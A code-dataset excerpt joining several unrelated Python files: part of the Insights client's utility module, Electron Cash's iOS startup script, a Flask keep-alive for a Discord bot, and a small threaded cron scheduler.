logger.debug('Could not find %s file, creating', logging_name)
machine_id = str(uuid.uuid4())
logger.debug("Creating %s", destination_file)
write_to_disk(destination_file, content=machine_id)
machine_id = str(machine_id).strip()
try:
uuid.UUID(machine_id, version=4)
return machine_id
except ValueError as e:
logger.error("Invalid machine ID: %s", machine_id)
logger.error("Error details: %s", str(e))
logger.error("Remove %s and a new one will be generated.\nRerun the client with --register", destination_file)
sys.exit(constants.sig_kill_bad)
def _expand_paths(path):
"""
Expand wildcarded paths
"""
dir_name = os.path.dirname(path)
paths = []
logger.debug("Attempting to expand %s", path)
if os.path.isdir(dir_name):
files = os.listdir(dir_name)
match = os.path.basename(path)
for file_path in files:
if re.match(match, file_path):
expanded_path = os.path.join(dir_name, file_path)
paths.append(expanded_path)
logger.debug("Expanded paths %s", paths)
return paths
else:
logger.debug("Could not expand %s", path)
def validate_remove_file(config):
"""
Validate the remove file and tags file
"""
return InsightsUploadConf(config).validate()
def write_data_to_file(data, filepath):
'''
Write data to file
'''
try:
os.makedirs(os.path.dirname(filepath), 0o700)
except OSError:
pass
write_to_disk(filepath, content=data)
def magic_plan_b(filename):
'''
Use this in instances where
python-magic is MIA and can't be installed
for whatever reason
'''
cmd = shlex.split('file --mime-type --mime-encoding ' + filename)
stdout, stderr = Popen(cmd, stdout=PIPE).communicate()
stdout = stdout.decode("utf-8")
mime_str = stdout.split(filename + ': ')[1].strip()
return mime_str
def run_command_get_output(cmd):
proc = Popen(shlex.split(cmd),
stdout=PIPE, stderr=STDOUT)
stdout, stderr = proc.communicate()
return {
'status': proc.returncode,
'output': stdout.decode('utf-8', 'ignore')
}
def modify_config_file(updates):
'''
Update the config file with certain things
'''
cmd = '/bin/sed '
for key in updates:
cmd = cmd + '-e \'s/^#*{key}.*=.*$/{key}={value}/\' '.format(key=key, value=updates[key])
cmd = cmd + constants.default_conf_file
status = run_command_get_output(cmd)
write_to_disk(constants.default_conf_file, content=status['output'])
def get_version_info():
'''
Get the insights client and core versions for archival
'''
try:
client_version = wrapper_constants.version
except AttributeError:
# wrapper_constants is None or has no attribute "version"
client_version = None
version_info = {}
version_info['core_version'] = '%s-%s' % (package_info['VERSION'], package_info['RELEASE'])
version_info['client_version'] = client_version
return version_info
def print_egg_versions():
'''
Log all available eggs' versions
'''
versions = get_version_info()
logger.debug('Client version: %s', versions['client_version'])
logger.debug('Core version: %s', versions['core_version'])
logger.debug('All egg versions:')
eggs = [
os.getenv('EGG'),
'/var/lib/insights/newest.egg',
'/var/lib/insights/last_stable.egg',
'/etc/insights-client/rpm.egg',
]
if not sys.executable:
logger.debug('Python executable not found.')
return
for egg in eggs:
if egg is None:
logger.debug('ENV egg not defined.')
continue
if not os.path.exists(egg):
logger.debug('%s not found.', egg)
continue
try:
proc = Popen([sys.executable, '-c',
'from insights import package_info; print(\'%s-%s\' % (package_info[\'VERSION\'], package_info[\'RELEASE\']))'],
env={'PYTHONPATH': egg, 'PATH': os.getenv('PATH')}, stdout=PIPE, stderr=STDOUT)
except OSError:
logger.debug('Could not start python.')
return
stdout, stderr = proc.communicate()
version = stdout.decode('utf-8', 'ignore').strip()
logger.debug('%s: %s', egg, version)
def read_pidfile():
'''
Read the pidfile we wrote at launch
'''
pid = None
try:
with open(constants.pidfile) as pidfile:
pid = pidfile.read()
except IOError:
logger.debug('Could not open pidfile for reading.')
return pid
def _systemd_notify(pid):
'''
Ping the systemd watchdog with the main PID so that
the watchdog doesn't kill the process
'''
try:
proc = Popen(['/usr/bin/systemd-notify', '--pid=' + str(pid), 'WATCHDOG=1'])
except OSError as e:
logger.debug('Could not launch systemd-notify: %s', str(e))
return False
stdout, stderr = proc.communicate()
if proc.returncode != 0:
logger.debug('systemd-notify returned %s', proc.returncode)
return False
return True
def systemd_notify_init_thread():
'''
Use a thread to periodically ping systemd instead
of calling it on a per-command basis
'''
pid = read_pidfile()
if not pid:
logger.debug('No PID specified.')
return
if not os.getenv('NOTIFY_SOCKET'):
# running standalone, not via systemd job
return
if not os.path.exists('/usr/bin/systemd-notify'):
# RHEL 6, no systemd
return
def _sdnotify_loop():
while True:
# run sdnotify every 30 seconds
if not _systemd_notify(pid):
# end the loop if something goes wrong
break
time.sleep(30)
sdnotify_thread = threading.Thread(target=_sdnotify_loop, args=())
sdnotify_thread.daemon = True
sdnotify_thread.start()
def get_tags(tags_file_path=constants.default_tags_file):
'''
Load tag data from the tags file.
Returns: a dict containing tags defined on the host.
'''
tags = None
if os.path.isfile(tags_file_path):
try:
tags = load_yaml(tags_file_path)
except RuntimeError:
logger.error("Invalid YAML. Unable to load %s", tags_file_path)
return None
else:
logger.debug("%s does not exist", tags_file_path)
return tags
def write_tags(tags, tags_file_path=constants.default_tags_file):
"""
Writes tags to tags_file_path
Arguments:
- tags (dict): the tags to write
- tags_file_path (string): path to which tag data will be written
Returns: None
"""
with open(tags_file_path, mode="w+") as f:
data = yaml.dump(tags, Dumper=Dumper, default_flow_style=False)
f.write(data)
def migrate_tags():
'''
We initially released the tags feature with the tags file set as
tags.conf, but soon after switched it over to tags.yaml. There may be
installations out there with tags.conf files, so rename the files.
'''
tags_conf = os.path.join(constants.default_conf_dir, 'tags.conf')
tags_yaml = os.path.join(constants.default_conf_dir, 'tags.yaml')
if os.path.exists(tags_yaml):
# current default file exists, do nothing
return
if os.path.exists(tags_conf):
# old file exists and current does not
logger.info('Tags file %s detected. This filename is deprecated; please use %s. The file will be renamed automatically.',
tags_conf, tags_yaml)
try:
os.rename(tags_conf, tags_yaml)
except OSError as e:
logger.error(e)
def get_parent_process():
'''
Get parent process of the client
Returns: string
'''
ppid = os.getppid()
output = run_command_get_output('cat /proc/%s/status' % ppid)
if output['status'] == 0:
name = output['output'].splitlines()[0].split('\t')[1]
return name
else:
return "unknown"
def os_release_info():
'''
Use insights-core to fetch the os-release or redhat-release info
Returns a tuple of OS name and version
'''
os_family = "Unknown"
os_release = ""
for p in ["/etc/os-release", "/etc/redhat-release"]:
try:
with open(p) as f:
data = f.readlines()
ctx = Context(content=data, path=p, relative_path=p)
if p == "/etc/os-release":
rls = OsRelease(ctx)
os_family = rls.data.get("NAME")
os_release = rls.data.get("VERSION_ID")
elif p == "/etc/redhat-release":
rls = RedhatRelease(ctx)
os_family = rls.product
os_release = rls.version
break
except IOError:
continue
except Exception as e:
logger.warning("Failed to detect OS version: %s", e)
return (os_family, os_release)
def largest_spec_in_archive(archive_file):
logger.info("Checking for large files...")
tar_file = tarfile.open(archive_file, 'r')
largest_fsize = 0
largest_file_name = ""
largest_spec = ""
# get the name of the archive
name = os.path.basename(archive_file).split(".tar.gz")[0]
# get the archives from inside meta_data directory
metadata_top = os.path.join(name, "meta_data/")
data_top = os.path.join(name, "data")
for file in tar_file.getmembers():
if metadata_top in file.name:
file_extract = tar_file.extractfile(file.name)
specs_metadata = json.load(file_extract)
results = specs_metadata.get("results", [])
if not results:
continue
if not isinstance(results, list):
# specs with only one resulting file are not in list form
results = [results]
for result in results:
# get the path of the spec result and check its filesize
fname = result.get("object", {}).get("relative_path")
abs_fname = os.path.join('.', data_top, fname)
# get the archives from inside data directory
data_file = tar_file.getmember(abs_fname)
if(data_file.size > largest_fsize):
largest_fsize = data_file.size
largest_file_name = fname
largest_spec = specs_metadata["name"]
return (largest_file_name, largest_fsize, largest_spec)
def size_in_mb(num_bytes):
return float(num_bytes) / (1024 * 1024)
|
app.py | #
# This file is:
# Copyright (C) 2018 Calin Culianu <calin.culianu@gmail.com>
#
# MIT License
#
import os
from electroncash_gui.ios_native.monkeypatches import MonkeyPatches
from electroncash.util import set_verbosity
from electroncash_gui.ios_native import ElectrumGui
from electroncash_gui.ios_native.utils import call_later, get_user_dir, cleanup_tmp_dir, is_debug_build, NSLogSuppress, NSLog
from electroncash.simple_config import SimpleConfig
# NB: This is called from appdelegate.py "application_didFinishLaunchingWithOptions_"
def main():
cleanup_tmp_dir()
config_options = {
'verbose': is_debug_build(),
'cmd': 'gui',
'gui': 'ios_native',
'cwd': os.getcwd(),
'whitelist_servers_only' : True, # on iOS we force only the whitelist ('preferred') servers only for now as a security measure
}
set_verbosity(config_options.get('verbose'), timestamps=False, thread_id=False)
NSLogSuppress(not config_options.get('verbose'))
MonkeyPatches.patch()
config = SimpleConfig(config_options, read_user_dir_function = get_user_dir)
gui = ElectrumGui(config)
call_later(0.010, gui.main) # this is required for the activity indicator to actually animate. Switch to a direct call if not using activity indicator on Splash2
_printStats(config_options) # Prints some startup/debug stats such as Python version and SSL version (this is done in another thread to hopefully not impact startup overhead too much, as importing ssl may be a bit heavy)
return "Bitcoin Cash FTW!"
def _printStats(config_options):
import threading
def thrdfunc(config_options):
# lazy init of SSL
import ssl, sys
from electroncash import version
NSLog("Electron Cash lib version: %s (using server protocol: %s)", version.PACKAGE_VERSION, version.PROTOCOL_VERSION)
NSLog("Python version: %s", ' '.join(sys.version.split('\n')))
NSLog("OpenSSL version: %s", ssl.OPENSSL_VERSION)
#NSLog("Environment Vars:")
#for k,v in os.environ.copy().items():
# NSLog("%s=%s", str(k), str(v))
#NSLog("Config Vars:")
#for k,v in config_options.copy().items():
# NSLog("config[%s] = %s", str(k), str(v))
# /
# We do this from a thread so as to not delay app startup by importing more stuff we don't strictly need.
threading.Thread(target=thrdfunc, args=(config_options,), daemon=True).start()
|
keep_bot_alive.py | from discord.ext import tasks
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return "Bot is running"
def run():
app.run(host="0.0.0.0", port=8080)
def keep_alive():
server = Thread(target=run)
server.start()
@tasks.loop(seconds=10)
async def change_status(client, discord):
await client.change_presence(activity=discord.Game(next(status)))
|
cron.py | # coding: utf-8
import uuid
import threading
import time
from . import patch
class Crontab(object):
def __init__(self):
self._tasks = {}
self._running = False
self._cycle = 3.0
self._drain()
def start(self):
self._running = True
def stop(self):
self._running = False
def running(self):
return self._running
def addfunc(self, func, *args, **kwargs):
key = str(uuid.uuid4())
self._tasks[key] = [func, args, kwargs]
return key
def delfunc(self, key):
del(self._tasks[key])
@patch.go
def _drain(self):
while True:
if not self._running:
time.sleep(1.5)
continue
for task in self._tasks.values():
func, args, kwargs = task
t = threading.Thread(target=func, args=args, kwargs=kwargs)
t.daemon=True
t.start()
time.sleep(max(0.5, self._cycle))
if __name__ == '__main__':
m = Crontab()
def say(msg = 'hello'):
print 'say:', msg
m.addfunc(say, 'hi')
key = m.addfunc(say, 'hey')
m.start()
time.sleep(2)
m.delfunc(key)
time.sleep(2)
print 'stop', m.running()
m.stop()
time.sleep(2)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.